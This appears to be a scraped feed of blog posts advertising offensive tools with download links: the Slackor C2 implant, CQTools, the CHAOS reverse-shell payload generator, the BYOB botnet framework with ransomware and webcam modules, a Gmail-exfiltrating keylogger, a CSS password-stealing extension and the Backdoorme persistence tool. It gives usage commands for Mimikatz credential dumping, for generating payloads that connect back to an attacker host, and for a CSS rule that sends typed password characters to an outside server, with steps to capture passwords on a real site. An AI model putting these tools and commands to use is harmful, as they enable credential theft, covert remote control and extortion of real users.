<li>Lulzbin find by <a href="https://twitter.com/vector_sec/status/896049052642533376%5D" rel="nofollow" target="_blank" title="@vector_sec">@vector_sec</a></li>
<li>Countless threads on StackOverflow</li>
<li>Thanks to <a href="https://github.com/SecureAuthCorp/impacket" rel="nofollow" target="_blank" title="impacket">impacket</a> for dumping hashes from SAM/SYS/SECURITY reg hives.</li>
<li>LSASS dump credential extraction made possbile using <a href="https://github.com/skelsec/pypykatz" rel="nofollow" target="_blank" title="pypykatz">pypykatz</a> by skelsec</li>
</ul>
<br />
<span style="font-size: x-large;"><b>Future goals</b></span><br />
<ul>
<li>DOSfuscation</li>
<li>Reflectively load DLL/PE - <a href="https://github.com/vyrus001/go-mimikatz" rel="nofollow" target="_blank" title="https://github.com/vyrus001/go-mimikatz">https://github.com/vyrus001/go-mimikatz</a></li>
<li>Execute C# assemblies in memory - <a href="https://github.com/lesnuages/go-execute-assembly" rel="nofollow" target="_blank" title="https://github.com/lesnuages/go-execute-assembly">https://github.com/lesnuages/go-execute-assembly</a></li>
<li>Source code <a href="https://www.kitploit.com/search/label/Obfuscation" target="_blank" title="obfuscation">obfuscation</a> <a href="https://github.com/unixpickle/gobfuscate" rel="nofollow" target="_blank" title="https://github.com/unixpickle/gobfuscate">https://github.com/unixpickle/gobfuscate</a></li>
</ul>
<br />
<span style="font-size: x-large;"><b>FAQ:</b></span><br />
<strong>Is this safe to use for red teams/pentesting?</strong><br />
Yes, given some conditions. While the data is encrypted in transit, the agent contains the key for decryption. Anyone who acquires a copy of the agent could <a href="https://www.kitploit.com/search/label/Reverse%20Engineer" target="_blank" title="reverse engineer">reverse engineer</a> it and extract the API keys and the AES secret key. Anyone who compromises or otherwise gains access to the workspace would be able to retrieve all data within it. For this reason, it is not recommended to re-use infrastructure against multiple organizations.<br />
<strong>What about Mimikatz?</strong><br />
The implant does not have in-memory password dumping functionality. If you need logonPasswords, you can try the following:<br />
<pre><code>(Slackor: AGENT)minidump</code></pre>
THis will automically extract passwords with Pypykatz. Alternatively, you can use Mimikatz on Windows.<br />
<pre><code>>mimikatz.exe
mimikatz # sekurlsa::Minidump lsassdump.dmp
mimikatz # sekurlsa::logonPasswords</code></pre>
<strong>Is it cross-platform?</strong><br />
Not yet. It has not been fully tested on a variety of systems. The server was designed to run on <a href="https://www.kitploit.com/search/label/Kali%20Linux" target="_blank" title="Kali Linux">Kali Linux</a> and the agent on Windows 10.<br />
<strong>How well does it scale?</strong><br />
Scalability is limited by the Slack API. If you have multiple agents, consider increasing the beacon interval of beacons not in use.<br />
<strong>Is it <a href="https://www.kitploit.com/search/label/Vulnerable" target="_blank" title="vulnerable">vulnerable</a> to standard beacon analysis?</strong><br />
Currently each beacon has 20% jitter built in, and beacon times can be customized. Agent check-in request and response packets will be about the same size each time as long as no new commands are recieved.<br />
<strong>Why did you do [x] when a better way to do it is [y]?</strong><br />
I tried my best. PRs are encouraged :)<br />
<strong>It gets caught by AV!</strong><br />
The built-in HTA stager is created by <a href="https://github.com/hlldz/SpookFlare" rel="nofollow" target="_blank" title="SpookFlare">SpookFlare</a> which is based on <a href="https://github.com/nccgroup/demiguise" rel="nofollow" target="_blank" title="Demiguise">Demiguise</a>. If you want your droppers to not get snagged you probably want to go custom. The built in droppers are just there to get you started.<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Coalfire-Research/Slackor" rel="nofollow" target="_blank" title="Download Slackor">Download Slackor</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-67460216716091041432019-05-08T16:43:00.000-04:002019-05-08T16:43:02.761-04:00CQTools - The New Ultimate Windows Hacking Toolkit <div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-tLgxULPDSJg/XNJZEmfP-qI/AAAAAAAAOy4/NTTIz2PyXYA3eTp37bm_V3Ead_qs-VUEwCLcBGAs/s1600/cqurebhasia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="576" data-original-width="1024" height="360" src="https://1.bp.blogspot.com/-tLgxULPDSJg/XNJZEmfP-qI/AAAAAAAAOy4/NTTIz2PyXYA3eTp37bm_V3Ead_qs-VUEwCLcBGAs/s640/cqurebhasia.jpg" width="640" /></a></div>
<br />
<div style="text-align: justify;">
CQURE Team has prepared tools used during penetration testing and packed those in a toolkit named CQTools. This toolkit allows to deliver complete attacks within the infrastructure, starting with sniffing and spoofing activities, going through information extraction, password extraction, custom shell generation, custom payload generation, hiding code from antivirus solutions, various keyloggers and leverage this information to deliver attacks. Some of the tools are based on discoveries that were released to the world for the first time by CQURE Team. CQURE was the first team that did full <a href="https://www.kitploit.com/search/label/Reverse%20Engineering" target="_blank">reverse engineering</a> of DPAPI (Data Protection Application Programming Interface) and prepared the first public tool that allows monitoring WSL (Windows Subsystem for Linux) feature.</div>
<div style="text-align: justify;">
</div>
<a name='more'></a><br />
<div style="text-align: justify;">
This toolkit allows you to deliver complete attacks within the infrastructure, starting with sniffing and spoofing activities, going through information extraction, password extraction, custom shell generation, custom payload generation, hiding code from antivirus solutions, various <a href="https://www.kitploit.com/search/label/Keylogger" target="_blank">keyloggers</a> and leverage this information to deliver attacks. Some of the tools are based on discoveries that were released to the world for the first time by CQURE Team; some of the tools took years to complete, and all of the tools work in a straightforward manner. CQTools is the ultimate toolkit to have when delivering a penetration test. The tools work simply, and we use them in practice during our cybersecurity assignments. Come and have a look at how our CQTools can boost your penetration testing experience!</div>
<br />
• <a href="http://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Januszkiewicz-CQTools-New-Ultimate-Hacking-Toolkit.pdf" target="_blank">Download Presentation Slides</a><br />
• <a href="http://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Januszkiewicz-CQTools-New-Ultimate-Hacking-Toolkit-wp.pdf" target="_blank">Download White Paper</a><br />
<br />
More info: <a href="https://cqureacademy.com/blog/no-category/black-hat-asia-2019-tools" rel="nofollow" target="_blank">https://cqureacademy.com/blog/no-category/black-hat-asia-2019-tools</a><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://4f2bcn3u2m2u2z7ghc17a5jm-wpengine.netdna-ssl.com/wp-content/uploads/2019/03/cqtools-the-new-ultimate-hacking-toolkit-black-hat-asia-2019-2.7z" target="_blank">Download CQTools</a></span></b></div>
<div style="text-align: center;">
<b><span style="font-size: large;">Password: CQUREAcademy#123!</span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-45050716846271648192019-04-04T08:43:00.000-03:002019-04-04T11:34:24.290-03:00CHAOS Framework v3.0 - Generate Payloads And Control Remote Windows Systems<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-6qg4hfveC28/XKJ02_nGSGI/AAAAAAAAOYg/dBERKbK-EOYMMsBKdpOVjKzqg9vbIQOJgCLcBGAs/s1600/CHAOS_11_screenshot.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="480" data-original-width="800" height="384" src="https://4.bp.blogspot.com/-6qg4hfveC28/XKJ02_nGSGI/AAAAAAAAOYg/dBERKbK-EOYMMsBKdpOVjKzqg9vbIQOJgCLcBGAs/s640/CHAOS_11_screenshot.gif" width="640" /></a></div>
<div align="center">
<br /></div>
<div style="text-align: left;">
CHAOS is a PoC that allow generate payloads and control remote operating systems.</div>
<br />
<span style="font-size: x-large;"><b>Features</b></span><br />
<table>
<tbody>
<tr> <th align="left">Feature</th> <th align="center">Windows</th> <th align="center">Mac</th> <th align="center">Linux</th> </tr>
<tr> <td align="left"><code>Reverse Shell</code></td> <td align="center">X</td> <td align="center">X</td> <td align="center">X</td> </tr>
<tr> <td align="left"><code>Download File</code></td> <td align="center">X</td> <td align="center">X</td> <td align="center">X</td> </tr>
<tr> <td align="left"><code>Upload File</code></td> <td align="center">X</td> <td align="center">X</td> <td align="center">X</td> </tr>
<tr> <td align="left"><code>Screenshot</code></td> <td align="center">X</td> <td align="center">X</td> <td align="center">X</td> </tr>
<tr> <td align="left"><code>Keylogger</code></td> <td align="center">X</td> <td align="center"></td> <td align="center"></td> </tr>
<tr> <td align="left"><code>Persistence</code></td> <td align="center">X</td> <td align="center"></td> <td align="center"></td> </tr>
<tr> <td align="left"><code>Open URL</code></td> <td align="center">X</td> <td align="center">X</td> <td align="center">X</td> </tr>
<tr> <td align="left"><code>Get OS Info</code></td> <td align="center">X</td> <td align="center">X</td> <td align="center">X</td> </tr>
<tr> <td align="left"><code>Fork Bomb</code></td> <td align="center">X</td> <td align="center">X</td> <td align="center">X</td> </tr>
<tr> <td align="left"><code>Run Hidden</code></td> <td align="center">X</td> <td align="center"></td> <td align="center"></td> </tr>
</tbody></table>
<br />
<span style="font-size: x-large;"><b>Tested On</b></span><br />
<strong>Kali Linux - ROLLING EDITION</strong><br />
<a name='more'></a><br />
<span style="font-size: x-large;"><b>How to Install</b></span><br />
<div>
<pre><code># Install dependencies
$ sudo apt install golang git -y
# Get this repository
$ go get github.com/tiagorlampert/CHAOS
# Get external golang dependencies (ARE REQUIRED GET ALL DEPENDENCIES)
$ go get github.com/kbinani/screenshot
$ go get github.com/lxn/win
$ go get github.com/matishsiao/goInfo
$ go get golang.org/x/sys/windows
# Maybe you will see the message "package github.com/lxn/win: build constraints exclude all Go files".
# It's occurs because the libraries are to windows systems, but it necessary to build the payload.
# Go into the repository
$ cd ~/go/src/github.com/tiagorlampert/CHAOS
# Run
$ go run main.go</code></pre>
</div>
<br />
<span style="font-size: x-large;"><b>How to Use</b></span><br />
<table>
<tbody>
<tr> <th align="left">Command</th> <th align="left">On HOST does...</th> </tr>
<tr> <td align="left"><code>generate</code></td> <td align="left">Generate a payload (e.g. <code>generate lhost=192.168.0.100 lport=8080 fname=chaos --windows</code>)</td> </tr>
<tr> <td align="left"><code>lhost=</code></td> <td align="left">Specify a ip for connection</td> </tr>
<tr> <td align="left"><code>lport=</code></td> <td align="left">Specify a port for connection</td> </tr>
<tr> <td align="left"><code>fname=</code></td> <td align="left">Specify a filename to output</td> </tr>
<tr> <td align="left"><code>--windows</code></td> <td align="left">Target Windows</td> </tr>
<tr> <td align="left"><code>--macos</code></td> <td align="left">Target Mac OS</td> </tr>
<tr> <td align="left"><code>--linux</code></td> <td align="left">Target Linux</td> </tr>
<tr> <td align="left"><code>listen</code></td> <td align="left">Listen for a new connection (e.g. <code>listen lport=8080</code>)</td> </tr>
<tr> <td align="left"><code>serve</code></td> <td align="left">Serve files</td> </tr>
<tr> <td align="left"><code>exit</code></td> <td align="left">Quit this program</td> </tr>
</tbody></table>
<table>
<tbody>
<tr> <th align="left">Command</th> <th align="left">On TARGET does...</th> </tr>
<tr> <td align="left"><code>download</code></td> <td align="left">File Download</td> </tr>
<tr> <td align="left"><code>upload</code></td> <td align="left">File Upload</td> </tr>
<tr> <td align="left"><code>screenshot</code></td> <td align="left">Take a Screenshot</td> </tr>
<tr> <td align="left"><code>keylogger_start</code></td> <td align="left">Start <a href="http://www.kitploit.com/search/label/Keylogger" rel="nofollow" target="_blank" title="Keylogger">Keylogger</a> session</td> </tr>
<tr> <td align="left"><code>keylogger_show</code></td> <td align="left">Show Keylogger session logs</td> </tr>
<tr> <td align="left"><code>persistence_enable</code></td> <td align="left">Install at Startup</td> </tr>
<tr> <td align="left"><code>persistence_disable</code></td> <td align="left">Remove from Startup</td> </tr>
<tr> <td align="left"><code>getos</code></td> <td align="left">Get OS name</td> </tr>
<tr> <td align="left"><code>lockscreen</code></td> <td align="left">Lock the OS screen</td> </tr>
<tr> <td align="left"><code>openurl</code></td> <td align="left">Open the URL informed</td> </tr>
<tr> <td align="left"><code>bomb</code></td> <td align="left">Run Fork Bomb</td> </tr>
<tr> <td align="left"><code>clear</code></td> <td align="left">Clear the Screen</td> </tr>
<tr> <td align="left"><code>back</code></td> <td align="left">Close connection but keep running on target</td> </tr>
<tr> <td align="left"><code>exit</code></td> <td align="left">Close connection and exit on target</td> </tr>
</tbody></table>
<br />
<span style="font-size: x-large;"><b>Video</b></span><br />
<div align="center">
<br />
<iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/Fq_0yDPFjYE" width="560"></iframe></div>
<br />
<span style="font-size: x-large;"><b>FAQ</b></span><br />
<blockquote>
<br />
<span style="font-size: large;"><b>Why does Keylogger <a href="http://www.kitploit.com/search/label/Capture" rel="nofollow" target="_blank" title="capture">capture</a> all uppercase letters?</b></span><br />
All the letters obtained using the keylogger are uppercase letters. It is a known issue, in case anyone knows how to fix the Keylogger function using golang, please contact me or open an issue.</blockquote>
<blockquote>
<br />
<span style="font-size: large;"><b>Why are necessary get and install external libraries?</b></span><br />
To implement the screenshot function i used a third-party library, you can check it in <a href="https://github.com/kbinani/screenshot" rel="nofollow" target="_blank" title="https://github.com/kbinani/screenshot">https://github.com/kbinani/screenshot</a> and <a href="https://github.com/lxn/win" rel="nofollow" target="_blank" title="https://github.com/lxn/win">https://github.com/lxn/win</a>. You must download and install it to generate the payload.</blockquote>
<br />
<span style="font-size: x-large;"><b>Contact</b></span><br />
<strong><a href="mailto:tiagorlampert@gmail.com" rel="nofollow" target="_blank" title="tiagorlampert@gmail.com">tiagorlampert@gmail.com</a></strong><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/tiagorlampert/CHAOS" rel="nofollow" target="_blank" tilte="CHAOS" title="Download CHAOS">Download CHAOS</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-47243572699209010922018-09-30T10:10:00.000-03:002018-09-30T10:10:06.155-03:00BYOB - Build Your Own Botnet<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-8x0RKQ35Ppo/W6magirLCaI/AAAAAAAAMnU/Ww9LLsX8VOobqz3HhN71nu68S-YYJDthgCLcBGAs/s1600/byob_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="356" data-original-width="356" height="400" src="https://3.bp.blogspot.com/-8x0RKQ35Ppo/W6magirLCaI/AAAAAAAAMnU/Ww9LLsX8VOobqz3HhN71nu68S-YYJDthgCLcBGAs/s400/byob_1.png" width="400" /></a></div>
<br />
<span style="font-size: x-large;"><b>BYOB (Build Your Own Botnet)</b></span><br />
<br />
<div style="text-align: justify;">
<strong>Disclaimer</strong>: This project should be used for authorized testing or educational purposes only.</div>
<div style="text-align: justify;">
BYOB is an open-source project that provides a framework for security researchers and developers to build and operate a basic botnet to deepen their understanding of the sophisticated malware that infects millions of devices every year and spawns modern botnets, in order to improve their ability to develop counter-measures against these threats.</div>
<div style="text-align: justify;">
It is designed to allow developers to easily implement their own code and add cool new features <em>without</em> having to write a <strong>RAT</strong> (Remote Administration Tool) or a <strong>C2</strong> (Command & Control server) from scratch.</div>
<div style="text-align: justify;">
<em>The RAT's key feature is that arbitrary code/files can be remotely loaded into memory from the C2 and executed on the target machine without writing anything to the disk.</em></div>
<a name='more'></a><br />
<span style="font-size: large;"><b>Server</b></span><br />
<code>usage: server.py [-h] [-v] [--host HOST] [--port PORT] [--database DATABASE]</code><br />
<em>Command & control server with persistent database and console</em><br />
<ul>
<li> <strong>Console-Based User-Interface</strong>: streamlined console interface for controlling client host machines remotely via reverse TCP shells which provide direct terminal access to the client host machines<br />
</li>
<li> <strong>Persistent SQLite Database</strong>: lightweight database that stores identifying information about client host machines, allowing reverse TCP shell sessions to persist through disconnections of arbitrary duration and enabling long-term reconnaissance<br />
</li>
<li> <strong>Client-Server Architecture</strong>: all python packages/modules installed locally are automatically made available for clients to remotely import without writing them to the disk of the target machines, allowing clients to use modules which require packages not installed on the target machines<br />
</li>
</ul>
<br />
<span style="font-size: large;"><b>Client</b></span><br />
<code>usage: client.py [-h] [-v] [--name NAME] [--icon ICON] [--pastebin API] [--encrypt] [--obfuscate] [--compress] [--compile] host port [module [module ...]]</code><br />
<em>Generate fully-undetectable clients with staged payloads, remote imports, and unlimited modules</em><br />
<ul>
<li> <strong>Remote Imports</strong>: remotely import third-party packages from the server without writing them to the disk or downloading/installing them<br />
</li>
<li> <strong>Nothing Written To The Disk</strong>: clients never write anything to the disk - not even temporary files (zero IO system calls are made) because remote imports allow arbitrary code to be dynamically loaded into memory and directly imported into the currently running process<br />
</li>
<li> <strong>Zero Dependencies (Not Even Python Itself)</strong>: client runs with just the python standard library, remotely imports any non-standard packages/modules from the server, and can be compiled with a standalone python interpreter into a portable binary executable formatted for any platform/architecture, allowing it to run on anything, even when Python itself is missing on the target host<br />
</li>
<li> <strong>Add New Features With Just 1 Click</strong>: any python script, module, or package you to copy to the <code>./byob/modules/</code> directory automatically becomes remotely importable & directly usable by every client while your command & control server is running<br />
</li>
<li> <strong>Write Your Own Modules</strong>: a basic module template is provided in <code>./byob/modules/</code> directory to make writing your own modules a straight-forward, hassle-free process<br />
</li>
<li> <strong>Run Unlimited Modules Without Bloating File Size</strong>: use remote imports to add unlimited features without adding a single byte to the client's file size<br />
</li>
<li> <strong>Fully Updatable</strong>: each client will periodically check the server for new content available for remote import, and will dynamically update its in-memory resources if anything has been added/removed<br />
</li>
<li> <strong>Platform Independent</strong>: everything is written in Python (a platform-agnostic language) and the clients generated can optionally be compiled into portable executable (<em>Windows</em>) or bundled into an standalone application (<em>macOS</em>)<br />
</li>
<li> <strong>Bypass Firewalls</strong>: clients connect to the command & control server via reverse TCP connections, which will bypass most <a href="http://www.kitploit.com/search/label/Firewalls">firewalls</a> because the default filter configurations primarily block incoming connections<br />
</li>
<li> <strong>Counter-Measure Against Antivirus</strong>: avoids being analyzed by <a href="http://www.kitploit.com/search/label/Antivirus">antivirus</a> by blocking processes with names of known antivirus products from spawning<br />
</li>
<li> <strong>Encrypt Payloads To Prevent Analysis</strong>: the main client payload is encrypted with a random 256-bit key which exists solely in the payload stager which is generated along with it<br />
</li>
<li> <strong>Prevent Reverse-Engineering</strong>: by default, clients will abort execution if a <a href="http://www.kitploit.com/search/label/Virtual%20Machine">virtual machine</a> or sandbox is detected<br />
</li>
</ul>
<br />
<span style="font-size: large;"><b>Modules</b></span><br />
<em>Post-exploitation modules that are remotely importable by clients</em><br />
<ol>
<li><strong>Keylogger</strong> (<code>byob.modules.keylogger</code>): logs the user’s keystrokes & the window name entered</li>
<li><strong>Screenshot</strong> (<code>byob.modules.screenshot</code>): take a screenshot of current user’s desktop</li>
<li><strong>Webcam</strong> (<code>byob.modules.webcam</code>): view a live stream or capture image/video from the webcam</li>
<li><strong>Ransom</strong> (<code>byob.modules.ransom</code>): encrypt files & generate random BTC wallet for ransom payment</li>
<li><strong>Outlook</strong> (<code>byob.modules.outlook</code>): read/search/upload emails from the local Outlook client</li>
<li><strong>Packet Sniffer</strong> (<code>byob.modules.packetsniffer</code>): run a packet sniffer on the host network & upload .pcap file</li>
<li><strong>Persistence</strong> (<code>byob.modules.persistence</code>): establish persistence on the host machine using 5 different methods</li>
<li><strong>Phone</strong> (<code>byob.modules.phone</code>): read/search/upload text messages from the client smartphone</li>
<li><strong>Escalate Privileges</strong> (<code>byob.modules.escalate</code>): attempt UAC bypass to gain unauthorized administrator privileges</li>
<li><strong>Port Scanner</strong> (<code>byob.modules.portscanner</code>): scan the local network for other online devices & open ports</li>
<li><strong>Process Control</strong> (<code>byob.modules.process</code>): list/search/kill/monitor currently running processes on the host</li>
</ol>
<br />
<span style="font-size: large;"><b>Core</b></span><br />
<em>Core framework modules used by the generator and the server</em><br />
<ol>
<li><strong>Utilities</strong> (<code>byob.core.util</code>): miscellaneous utility functions that are used by many modules</li>
<li><strong>Security</strong> (<code>byob.core.security</code>): Diffie-Hellman IKE & 3 encryption modes (AES-256-OCB, AES-256-CBC, XOR-128)</li>
<li><strong>Loaders</strong> (<code>byob.core.loaders</code>): remotely import any package/module/scripts from the server</li>
<li><strong>Payloads</strong> (<code>byob.core.payloads</code>): reverse TCP shell designed to remotely import dependencies, packages & modules</li>
<li><strong>Stagers</strong> (<code>byob.core.stagers</code>): generate unique payload stagers to prevent analysis & detection</li>
<li><strong>Generators</strong> (<code>byob.core.generators</code>): functions which all dynamically generate code for the client generator</li>
<li><strong>Database</strong> (<code>byob.core.database</code>): handles interaction between command & control server and the SQLite database</li>
</ol>
<ol> </ol>
<br />
<b><span style="font-size: large;">Contact</span></b><br />
<strong>Website</strong>: <a href="https://malwared.com/" rel="nofollow" target="_blank">https://malwared.com</a><br />
<strong>Email</strong>: <a href="mailto:security@malwared.com" rel="nofollow" target="_blank">security@malwared.com</a><br />
<strong>Twitter</strong>: <a href="https://twitter.com/malwaredllc">https://twitter.com/malwaredllc</a><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/malwaredllc/byob" rel="nofollow" target="_blank">Download BYOB</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-10226672960936576692018-09-02T18:33:00.000-03:002018-09-02T18:33:00.131-03:00Spykeyboard - Keylogger Which Sends Us The Data To Our Gmail<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-RSIEGCGyv7g/W4r3lPySlqI/AAAAAAAAMWc/5P9O4HRpaFskzvloV6ylXKq2uJOLa7QeACLcBGAs/s1600/Spykeyboard_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="800" data-original-width="1280" height="400" src="https://2.bp.blogspot.com/-RSIEGCGyv7g/W4r3lPySlqI/AAAAAAAAMWc/5P9O4HRpaFskzvloV6ylXKq2uJOLa7QeACLcBGAs/s640/Spykeyboard_1.png" width="640" /></a></div>
<br />
This is a script which allows us to generate an undetectable <a href="http://www.kitploit.com/search/label/Keylogger">keylogger</a> which sends the captured keys to our gmail mail. Once we generated our keylogger in our <a href="http://www.kitploit.com/search/label/Kali%20Linux">kali linux</a> we would have to pass the .py file to a <a href="http://www.kitploit.com/search/label/Windows">windows</a> machine to convert it to an .exe. The tool is under development.<br />
<br />
Install module in linux and windows:<br />
<pre><code>pip install keyboard</code></pre>
<br />
<span style="font-size: large;"><b>Compile to .exe</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-8JFqVUCfB7o/W4r3qIUaBPI/AAAAAAAAMWg/1JTtqnVnPlEemADI8TxGfQmmpVez7gAdwCLcBGAs/s1600/Spykeyboard_2_Screenshot%252520%252839%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="706" data-original-width="1521" height="296" src="https://4.bp.blogspot.com/-8JFqVUCfB7o/W4r3qIUaBPI/AAAAAAAAMWg/1JTtqnVnPlEemADI8TxGfQmmpVez7gAdwCLcBGAs/s640/Spykeyboard_2_Screenshot%252520%252839%2529.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/Sh4rk0-666/Spykeyboard" rel="nofollow" target="_blank">Download Spykeyboard</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-46804432279929123982018-06-04T18:23:00.000-04:002018-06-04T18:23:20.325-04:00CSS Keylogger - Chrome Extension And Express Server That Exploits Keylogging Abilities Of CSS<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-XYpssw1ZQBg/WxTY8Do5YfI/AAAAAAAALas/xa8oA6ayPDkuT9TWzE7qoSSH9haso_mMgCLcBGAs/s1600/CSS-Keylogger.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1067" data-original-width="1600" height="426" src="https://2.bp.blogspot.com/-XYpssw1ZQBg/WxTY8Do5YfI/AAAAAAAALas/xa8oA6ayPDkuT9TWzE7qoSSH9haso_mMgCLcBGAs/s640/CSS-Keylogger.jpeg" width="640" /></a></div>
<br />
Chrome extension and Express <a href="http://www.kitploit.com/search/label/Server">server</a> that <a href="http://www.kitploit.com/search/label/Exploits">exploits</a> keylogging abilities of CSS.<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>To use</b></span><br />
<br />
<b>Setup <a href="http://www.kitploit.com/search/label/Chrome">Chrome</a> extension</b><br />
<ol>
<li>Download repository <code>git clone https://github.com/maxchehab/CSS-Keylogging</code></li>
<li>Visit <code>chrome://extensions</code> in your browser (or open up the Chrome menu by clicking the icon to the far right of the Omnibox: The menu's icon is three horizontal bars. and select Extensions under the More Tools menu to get to the same place).</li>
<li>Ensure that the Developer mode checkbox in the top right-hand corner is checked.</li>
<li>Click <code>Load unpacked extension…</code> to pop up a file-selection dialog.</li>
<li>Select the <code>css-keylogger-extension</code> in the directory which you downloaded this repository.</li>
</ol>
<br />
<b>Setup Express server</b><br />
<ol>
<li><code>yarn</code></li>
<li><code>yarn start</code></li>
</ol>
<br />
<b>Haxking l33t passw0rds</b><br />
<ol>
<li>Open a website that uses a controlled component framework such as React. <a href="https://www.instagram.com/" rel="nofollow" target="_blank">https://instagram.com</a>.</li>
<li>Press the extension <code>C</code> on the top right of any webpage.</li>
<li>Type your password.</li>
<li>Your password should be captured by the express server.</li>
</ol>
<br />
<span style="font-size: large;"><b>How it works</b></span><br />
This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a <code>background-image</code>.<br />
For example, the following css will select all input's with a <code>type</code> that equals <code>password</code> and a <code>value</code> that ends with <code>a</code>. It will then try to load an image from <code>http://localhost:3000/a</code>.<br />
<div>
<pre><code>input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}</code></pre>
</div>
Using a simple <a href="https://github.com/maxchehab/CSS-Keylogging/blob/master/build.go" rel="nofollow" target="_blank">script</a> one can create a <a href="https://github.com/maxchehab/CSS-Keylogging/blob/master/css-keylogger-extension/keylogger.css" rel="nofollow" target="_blank">css file</a> that will send a custom request for every ASCII character.<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/maxchehab/CSS-Keylogging" rel="nofollow" target="_blank">Download CSS Keylogger</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-13060757905443814172018-06-03T18:30:00.000-04:002018-06-03T18:30:04.546-04:00Backdoorme - Powerful Auto-Backdooring Utility<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-9Ciu2VTBxAw/WxBG4ckX-II/AAAAAAAALXU/pjf1eoxaAcQ_xt23sMj9W6Du20GJxBxEACLcBGAs/s1600/backdoorme_2.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="600" data-original-width="1067" height="358" src="https://4.bp.blogspot.com/-9Ciu2VTBxAw/WxBG4ckX-II/AAAAAAAALXU/pjf1eoxaAcQ_xt23sMj9W6Du20GJxBxEACLcBGAs/s640/backdoorme_2.gif" width="640" /></a></div>
<br />
<div style="text-align: justify;">
Tools like metasploit are great for exploiting computers, but what happens after you've gained access to a computer? Backdoorme answers that question by unleashing a slew of backdoors to establish persistence over long periods of time.</div>
<div style="text-align: justify;">
Once an SSH connection has been established with the target, Backdoorme's strengths can come to fruition. Unfortunately, Backdoorme is not a tool to gain root access - only keep that access once it has been gained.</div>
<div style="text-align: justify;">
Please only use Backdoorme with explicit permission - please don't hack without asking.</div>
<a name='more'></a><br />
<span style="font-size: large;"><b>Usage</b></span><br />
Backdoorme is split into two parts: backdoors and modules.<br />
Backdoors are small snippets of code which listen on a port and redirect to an interpreter, like bash. There are many backdoors written in various languages to give variety.<br />
Modules make the backdoors more potent by running them more often, for example, every few minutes or whenever the computer boots. This helps to establish persistence.<br />
<br />
<b>Setup</b><br />
To start backdoorme, first ensure that you have the required dependencies.<br />
For Python 3.5+:<br />
<pre><code>$ sudo apt-get install python3 python3-pip python3-tk nmap
$ cd backdoorme/
$ virtualenv --python=python3.5 env
$ source env/bin/activate
(env) $ pip install -r requirements.txt</code></pre>
For Python 2.7:<br />
<pre><code>$ sudo python dependencies.py</code></pre>
<br />
<b>Getting Started</b><br />
Launching backdoorme:<br />
<pre><code>$ python master.py</code></pre>
To add a target:<br />
<pre><code>>> addtarget
Target Hostname: 10.1.0.2
Username: victim
Password: password123
+ Target 1 Set!
>></code></pre>
<br />
<b>Backdoors</b><br />
To use a backdoor, simply run the "use" keyword.<br />
<pre><code>>> use shell/metasploit
+ Using current target 1.
+ Using <a href="http://www.kitploit.com/search/label/Metasploit">Metasploit</a> backdoor...
(msf) >></code></pre>
From there, you can set options pertinent to the backdoor. Run either "show options" or "help" to see a list of parameters that can be configured. To set an option, simply use the "set" keyword.<br />
<pre><code>(msf) >> show options
Backdoor options:
Option Value Description Required
------ ----- ----------- --------
name initd name of the backdoor False
...
(msf) >> set name apache
+ name => apache
(msf) >> show options
Backdoor options:
Option Value Description Required
------ ----- ----------- --------
name apache name of the backdoor False
...</code></pre>
As in metasploit, backdoors are organized by category.<br />
<ul>
<li>Auxiliary<ul>
<li><strong>keylogger</strong> - Adds a keylogger to the system and gives the option to email results back to you.</li>
<li><strong>simplehttp</strong> - installs python's SimpleHTTP server on the client.</li>
<li><strong>user</strong> - adds a new user to the target.</li>
<li><strong>web</strong> - installs an Apache Server on the client.</li>
</ul>
</li>
<li>Escalation<ul>
<li><strong>setuid</strong> - the SetUID backdoor works by setting the setuid bit on a binary while the user has root acccess, so that when that binary is later run by a user without root access, the binary is executed with root access. By default, this backdoor flips the setuid bit on nano, so that if root access is ever lost, the attacker can SSH back in as an unprivileged user and still be able to run nano (or any chosen binary) as root. ('nano /etc/shadow'). Note that root access is initially required to deploy this escalation backdoor.</li>
